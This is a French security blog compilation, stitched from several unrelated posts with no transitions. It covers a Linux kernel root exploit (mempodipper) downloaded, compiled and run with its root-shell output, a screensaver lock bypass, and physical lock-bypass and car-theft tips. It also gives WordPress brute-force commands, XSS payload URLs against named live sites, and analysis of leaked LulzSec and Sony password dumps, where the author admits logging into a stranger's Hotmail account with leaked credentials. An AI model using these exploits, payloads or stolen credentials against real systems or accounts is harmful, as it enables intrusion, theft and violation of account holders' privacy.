Voici quelques sites marchands qui en proposent :

• Amazon
• Ebay
• Le bon coin
• Priceminister

Un petit rappel tout de même : il est interdit de manifester à visage couvert depuis le décret du 19 juin 2009, appelé "décret anti-cagoule". Une amende de 1 500 euros peut être infligée à toute personne qui dissimule son visage intentionnellement. Tous les détails de cette loi sont dans l’article R-645-14 du Code Pénal.

Source

$ wget www.tux-planet.fr/public/hack/exploits/kernel/mempodipper.c
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root

Les explications techniques sont lisibles ici, en anglais :
http://blog.zx2c4.com/749

Les touches à utiliser sont Alt + Ctrl + * . Attention, il faut se servir du caractère étoile du pavé numérique pour que cela fonctionne. Côté technique, cette combinaison envoie tout simplement un signal qui fait un kill sur le processus d'économiseur d'écran.

J'ai pu tester cet exploit avec succès sur une Fedora 16 et l’économiseur d'écran Xscreensaver activé. Les versions que j'utilise sont les suivantes :

$ rpm -qa | grep "xorg-x11-server-Xorg\|xscreensaver-base"
xscreensaver-base-5.15-3.fc16.x86_64
xorg-x11-server-Xorg-1.11.2-3.fc16.x86_64

Cela devrait marcher aussi pour Debian Testing, Debian Sid, ainsi que dans Gentoo et Archlinux. En revanche, la faille ne fonctionne pas sous Ubuntu 11.10, car la version de Xorg est la 1.10 :

$ Xorg -version
X.Org X Server 1.10.4
$ lsb_release -ds
Ubuntu 11.10

Bref, on critique souvent Windows & Co pour ses failles de sécurité, mais là, je pense que GNU/Linux a fait très fort.

Sommaire

• Comment ouvrir un coffre-fort électronique ?
• Comment ouvrir un garage de l'extérieur ?
• Comment ouvrir une porte fermée avec une chaîne coulissante ?
• Comment forcer un cadenas rond ?
• Comment briser une vitre de voiture facilement ?
• Comment se libérer de menottes en plastique ?
• Comment ouvrir une voiture ?
• Comment voler une voiture avec une canette ?

Comment ouvrir un coffre-fort électronique ?

Lorsque l'on voyage, on trouve souvent des coffres-forts électroniques à disposition dans les chambres d'hôtel. Ils permettent notamment de mettre à l’abri des objets de valeur.

Et bien, sachez qu'il existe une technique, appelée "Safe Bouncing", qui permet de les ouvrir sans connaître le code. Il suffit de taper sur le dessus du coffre et d'actionner l'ouverture en même temps :

Une autre technique consiste à lâcher le coffre et actionner l’ouverture en même temps :

Le safe bouncing fonctionne en général sur les coffres-forts électroniques de bon marché et de milieu de gamme.

Comment ouvrir un garage de l'extérieur ?

Vous avez perdu la télécommande de votre garage et vous êtes coincé à l'extérieur, et bien munissez-vous d'une longue tige métallique et actionnez le mécanisme à distance :

Comment ouvrir une porte fermée avec une chaîne coulissante ?

Pour ouvrir une porte fermée à l'aide d'une chaîne, il suffit de se munir d'un élastique, d'accrocher celui-ci à la chaîne et de le relier à la poignée de la porte :

Comment forcer un cadenas rond ?

Certains modèles de cadenas peuvent-être forcés facilement. Voici un exemple avec un cadenas rond, il suffit de prendre une fine plaque métallique (ex : une canette de boisson gazeuse) et de se confectionner un outil spécial :

Comment briser une vitre de voiture facilement ?

Si vous avez un accident de voiture et que votre véhicule tombe à l'eau (on ne sait jamais, hein !), la pression de l'eau fera que vous ne pourrez pas ouvrir les portes. Seule solution, briser une vitre. Mais cela n'est pas forcément évident, même en y mettant beaucoup de force. Il existe une technique pourtant simple, il suffit d'utiliser un outil appelé Auto Center Punch. Sinon, n'importe quel brise glace devrait aussi faire l'affaire.

PS : vous pouvez commencer la lecture à 2:00 minutes.

Cette vidéo explique également d'autres techniques pour survivre en cas d'immersion du véhicule.

Comment se libérer de menottes en plastique ?

Vous venez de faire une manifestation et la police a décidé de vous mettre, à tord,  des menottes en plastique ? Utilisez vos fesses pour vous libérer le plus simplement du monde :

Comment ouvrir une voiture ?

Une technique qui utilise une grande barre de métal vous permet d'ouvrir une voiture :

Comment voler une voiture avec une canette ?

Le meilleur pour la fin, comment voler une voiture avec une canette :

Source

Fireforce pourra servir, par exemple, pour tester la fiabilité de son login/password, ou encore tester la sécurité de son site Internet. Cerise sur le gâteau, l'extension est distribuée sous la licence libre GPLv3.

Vous pouvez télécharger et installer Firefoce en cliquant sur ce lien (32 Ko).

Note : chez moi cette extension fait ramer énormément ma machine.

Pour installer WPScan sur une distribution à base de Debian, ouvrez un terminal en root et lancez les commandes suivantes :

sudo apt-get install ruby libcurl4-gnutls-dev libopenssl-ruby rubygems subversion
sudo gem install typhoeus xml-simple

Ou pour une distribution à base de RPM :

yum install ruby rubygem-xml-simple rubygem-typhoeus subversion

Ensuite, il faut récupérer le code source depuis le dépôt SVN officiel :

svn checkout http://wpscan.googlecode.com/svn/trunk/ ./wpscan
cd wpscan

Pour finir, voici quelques exemples d'utilisation.

Lancer un simple audit :

ruby ./wpscan.rb --url www.example.com

Faire de la brute force sur l'interface d'administration, en utilisant un fichier de dictionnaire :

ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

Lister les plugins utilisés sur un site et afficher les failles de sécurité en relation :

ruby ./wpscan.rb --url www.example.com --enumerate p

Voici deux exemples d'utilisation. Pour WordPress version 3.2.1 :

http://www.futurefisherman.org/?s=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E

Et pour WordPress 3.1 :

http://blogs.comodo.com/?s=%3Cimg%20src=http://www.tux-planet.fr/public/hack/images/no-permission.jpg%20align=center%3E

Si vous êtes vulnérable à cette faille, voici une solution donnée par Aryo :

1. Allez dans "Apparence > Editeur" dans l’administration WP
2. Choisissez "Résultats de recherche (search.php)"
3. Trouvez la ligne qui correspond à l’affichage de la requête. Par exemple "Résultat de la recherche pour "<?php echo $s; ?>"
4. On aperçoit qu’en effet, l’affichage n’est pas protégé, alors on s’en charge. Remplacez <?php echo $s; ?> par <?php echo htmlspecialchars($s); ?>
5. Vérifiez que la faille n’est plus exploitable

Source

Sommaire

• Fonctionnement
• Installation et configuration du serveur
• Configuration d'un client Linux
• Configuration d'un client Windows
• Configuration du navigateur Internet
• Testez votre adresse IP, la rapidité de la connexion et résoudre les problèmes de lenteur
• La sécurité liée à ce genre de service

Fonctionnement 

Pour mettre en place ce système, il nous faut bien entendu un serveur dédié avec SSH. Si vous êtes la seule personne à l'utiliser, vous n'aurez pas besoin d'une machine très puissante. La plupart des serveurs dédiés bas de gamme devrait faire l'affaire.

Voici un petit schéma qui explique le fonctionnement d'une connexion Internet à travers un tunnel SSH :

La méthode reste assez simple, si l'on ne rentre pas dans les détails :

1. On branche le navigateur Internet de son PC en mode proxy sur l'adresse 127.0.0.1:8080
2. Le trafic est alors acheminé à l'aide d'un tunnel SSH chiffré, vers le serveur
3. Celui-ci s'occupe ensuite d'aller chercher les informations sur Internet à votre place
4. Les données reviennent sur la machine cliente par le même chemin

Installation et configuration du serveur 

Aucune configuration particulière n'est nécessaire sur le serveur dédié. Normalement, le serveur openSSH est installé et activé sur la plupart des distributions Linux ou Unix, et la configuration par défaut suffit.

Si jamais ce n’est pas le cas, ouvrez un terminal et lancez les commandes suivantes pour une distribution à base de RPM par exemple :

yum install sshd
/etc/init.d/sshd start

Configuration d'un client Linux 

Notre serveur est maintenant opérationnel. Nous allons donc pouvoir y connecter notre machine cliente sous Linux par le biais d'un tunnel SSH. Pour y arriver, ouvrez un terminal sur votre ordinateur et lancez la commande suivante :

ssh user@serveur -C -N -D 8080

Cette commande va alors ouvrir un tunnel et en même temps une session SSH vers le serveur. Il faudra absolument garder celle-ci ouverte pour que le tunnel ne soit pas fermé.

Voici quelques explications concernant les options utilisées :

• user@serveur : le compte SSH et l'adresse IP du serveur
• -C : permet de compresser le trafic et utiliser moins de bande passante
• -N : ne pas ouvrir de shell
• -D 8080 : permet de créer le tunnel SSH. Tout le trafic envoyé sur le port local (8080) sera redirigé dans le tunnel vers le serveur et ensuite vers Internet

Configuration d'un client Windows 

Sous Windows, le protocole SSH n'est pas disponible par défaut. Pour y remédier, on peut utiliser le célèbre logiciel Putty. Une fois lancé :

• Allez dans les menus Connection → SSH → Tunnels
• Indiquez 8080 dans le champ Source port et chochez les case Dynamic et Auto
• Cliquez ensuite sur Add :



• Retournez dans le menu Session et indiquez le compte de connexion et l'adresse du serveur dans le champ host :



• Pour finir, cliquez sur Open

Configuration du navigateur Internet 

Voici comment configurer votre navigateur en mode proxy socks. Avec Firefox, Allez dans le menu Options → Avancé → Réseau → Paramètres et utilisez la configuration suivante :

A la suite de cela, vous devriez pouvoir naviguer sur Internet comme vous le faites normalement.

Une remarque de @niluje en commentaire : il faut faire attention, si quelqu'un sniff le trafic au niveau du navigateur, il ne récupérera certes pas le trafic car il est chiffré mais il pourra voir toutes les requêtes DNS. Pour que les requêtes DNS soient aussi socks, il faut saisir l'adresse about:config dans Firefox et changer la valeur network.proxy.socks_remote_dns à true.

Testez votre adresse IP, la rapidité de la connexion et résoudre les problèmes de lenteur 

Voici quelques commandes bash très pratiques pour tester votre adresse IP et la rapidité de la connexion en passant par le tunnel. Ces dernières sont à utiliser sur la machine cliente Linux (si vous utilisez Windows, il faudra faire autrement) :

$ curl --socks5 127.0.0.1:8080 www.whatismyip.org
$ curl --socks5 127.0.0.1:8080 -w 'Lookup time:\t%{time_namelookup}\nConnect time:\t%{time_connect}\nTotal time:\t%{time_total}\n' -o /dev/null -s www.tux-planet.fr

Lookup time: 0.000
Connect time: 0.001
Total time: 0.035

Et sans tunnel :

$ curl www.whatismyip.org
$ curl -w 'Lookup time:\t%{time_namelookup}\nConnect time:\t%{time_connect}\nTotal time:\t%{time_total}\n' -o /dev/null -s www.tux-planet.fr

Lookup time: 0.001
Connect time: 0.009
Total time: 0.045

Si l'écart entre une connexion avec et sans tunnel SSH est trop important, la navigation sur Internet sera alors très lente. Si c'est votre cas, pensez à vérifier la configuration DNS du serveur (fichier /etc/resolv.conf) car c'est souvent la cause n°1 de ce genre de problème. Des commandes de test sont disponibles ici.

La sécurité liée à ce genre de service 

La meilleure façon de sécuriser ce genre de serveur est d'utiliser un firewall et d'autoriser uniquement les connexions SSH depuis des adresses IP connues. Voici un exemple de script IPTABLES qui devrait faire l'affaire dans la plupart des cas (pensez à adapter les variables) :

#!/bin/bash

# Variables
export IF_RESEAU="eth0"
export MY_IP="88.xxx.xxx.xxx"

# On efface toutes les regles existantes
/sbin/iptables -F

# On supprime d'eventuelles regles personnelles
/sbin/iptables -X 

# Mise en place des regles par defaut (on refuse tout par default)
/sbin/iptables -P INPUT DROP
/sbin/iptables -P FORWARD DROP
/sbin/iptables -P OUTPUT DROP

# On accepte les connexions sur la boucle locale (sur lo == 127.0.0.1)
/sbin/iptables -A INPUT  -i lo -j ACCEPT
/sbin/iptables -A OUTPUT -o lo -j ACCEPT

# On autorise ssh que pour certaines adresses IP
/sbin/iptables -A INPUT -i $IF_RESEAU -p tcp --dport ssh --source $MY_IP -j ACCEPT

# On interdit le ssh pour les autres
# A mettre apres la liste des machines autorisee au ssh
/sbin/iptables -A INPUT -i $IF_RESEAU -p tcp --dport ssh -j DROP

# On accept le DNS + HTTP + HTTPS en sortie
/sbin/iptables -A OUTPUT -o $IF_RESEAU -p udp --dport 53    -j ACCEPT
/sbin/iptables -A OUTPUT -o $IF_RESEAU -p tcp --dport http  -j ACCEPT
/sbin/iptables -A OUTPUT -o $IF_RESEAU -p tcp --dport https -j ACCEPT

# On autorise les connexions deja etablies ou relatives a une autre connexion a sortir
/sbin/iptables -A OUTPUT -o $IF_RESEAU --match state --state ESTABLISHED,RELATED -j ACCEPT

# On autorise les connexions deja etablies a entrer
/sbin/iptables -A INPUT -i $IF_RESEAU --match state --state ESTABLISHED,RELATED -j ACCEPT

# On sauvegarde la configuration de iptables
/etc/init.d/iptables save

# On redemarre le service iptable pour prendre en compte la nouvelle configuration
/etc/init.d/iptables restart

# Chargement du module de gestion des connexion state
# (autorisation des connexions deja etablies a passer le firewall)
# Sur distrib ovh, pas possible car noyau monolitique
/sbin/modprobe ip_conntrack

Si vous utilisez ce script, désactivez le démarrage automatique d'IPTABLES au boot du serveur, cela vous évitera des problèmes :

chkconfig iptables off
chkconfig ip6tables off

Mais, il est important de garder à l'esprit que si quelqu'un pirate le serveur, il pourra potentiellement capturer l'ensemble de votre trafic en sortie (avec tcpdump par exemple). C'est un peu le revers de la médaille. Il est donc important d'avoir un serveur à jour et de continuer à utiliser vos méthodes traditionnelles de connexions sur les sites sensibles (ex: utilisation de HTTPS).

Je vais vous épargner une énième analyse sur le top 20 des passwords les plus utilisés, de toute façon ce sont toujours les mêmes qui reviennent. Le fichier est disponible ici, regardez quand même si vous ne faites pas partie de la liste, on ne sait jamais.

Voici quelques commandes bash pour la forme, qui permettent de se faire une idée rapide du nombre de mots de passe et de leur répartition en fonction du service de messagerie utilisé :

$ mv "LulzSec Delivers.txt" passwd-lulzsec-60k
$ wc -l passwd-lulzsec-60k
62178 passwd-lulzsec-60k

$ grep -ci "hotmail\|msn\|live" passwd-lulzsec-60k
21169

$ grep -ci yahoo passwd-lulzsec-60k
11497

$ grep -ci "aol\|aim" passwd-lulzsec-60k
4839

$ grep -ci gmail passwd-lulzsec-60k
4901

$ grep -ci "\.mil " passwd-lulzsec-60k
28

$ grep -ci "gov.br" passwd-lulzsec-60k
12

J'ai pris le temps de tester quelques combinaisons, beaucoup ne fonctionnent pas. Cela me fait penser que Gmail, Yahoo et autres ont déjà réagi. Je suis tout de même rentré sur un compte Hotmail, Microsoft est peut-être, une fois encore, en retard .

Merci à Vincent, Paul, Guillaume et Vianney pour leur participation à cet article.

La publication de ces informations a eu lieu sous la forme d'une archive zip, envoyée sur le réseau Bittorent. Elle fait une taille de 4,66 Mo et après extraction, on trouve la présence de plusieurs fichiers texte.

L'un d'eux nous indique que le piratage a eu lieu par le biais d'une injection SQL à cette adresse, mais on n'en sait pas plus :

http://www.sonypictures.com/homevideo/ghostbusters/photoupload/view.php?id=12838

Les trois fichiers qui contiennent des mots de passe sont les suivants :

• Sony_Pictures_International_AUTOTRADER_USERS.txt
• Sony_Pictures_International_BEAUTY_USERS.txt
• Sony_Pictures_International_DELBOCA_USERS.txt

Pour plus de simplicité, on les renomme :

mv Sony_Pictures_International_AUTOTRADER_USERS.txt sony1
mv Sony_Pictures_International_BEAUTY_USERS sony2
mv Sony_Pictures_International_DELBOCA_USERS.txt sony3

Puis, on extrait les logins et passwords à coup de commandes bash :

$ cat sony1 | grep "0000-00-00" | awk -F'|' '{print $10" | "$9}' >> passwd
$ cat sony2 | grep " | " | grep -v "EMAIL" >> passwd
$ cat sony3 | grep " | " | grep -v "EMAIL" >> passwd

$ sort -u passwd > passwd2 && mv passwd2 passwd
$ wc -l passwd
36343

Nous sommes en présence de 36 343 mots de passe. Un bref coup d’œil au fichier et on se rend compte qu'ils ne sont même pas chiffrés.

On continue afin de savoir quels sont ceux qui sont les plus utilisés :

$ cat passwd | awk -F' | ' '{print $3}' | sort | uniq -c | sort -nr | head -n 20
108 seinfeld
96 password
75 123456
73 winner
44 purple
40 sweeps
36 contest
34 princess
32 maggie
30 9452
29 shadow
29 peanut
27 ginger
26 sunshine
26 buster
25 cookie
24 tigger
24 summer
24 michael
...

Pas de doute, le comportement des utilisateurs n'a pas évolué depuis le piratage de 20 000 comptes Gmail, Hotmail et Yahoo. On retrouve toujours les mêmes : password, 123456, princess...

On poursuit avec la longueur des mots de passe :

$ cat passwd | awk -F' | ' '{print $3}' | sort | uniq -c | sort -nr | awk '{print $2}' > long.lst
$ for line in `cat long.lst`; do echo $line | wc -c; done | sort | uniq -c | sort -nr
8509 - 10 lettres
6788 - 8 lettres
5577 - 9 lettres
3887 - 11 lettres
2277 - 12 lettres
866 - 13 lettres
494 - 7 lettres
404 - 14 lettres
234 - 6 lettres
163 - 15 lettres
84 - 16 lettres
33 - 17 lettres
26 - 18 lettres
...

Là, pas grand chose à dire, les mots de passe sont pour la plupart construits avec 6 lettres et plus.

Les hackers de Lulzsec revendiquent le vol d'1 000 000 de mots de passe au total, les 30 000 disponibles sur la toile actuellement ne seraient qu'un échantillon. Difficile de vérifier cette information aujourd'hui. Si jamais ils publient tout cela un jour, je vous tiendrais au courant.

Source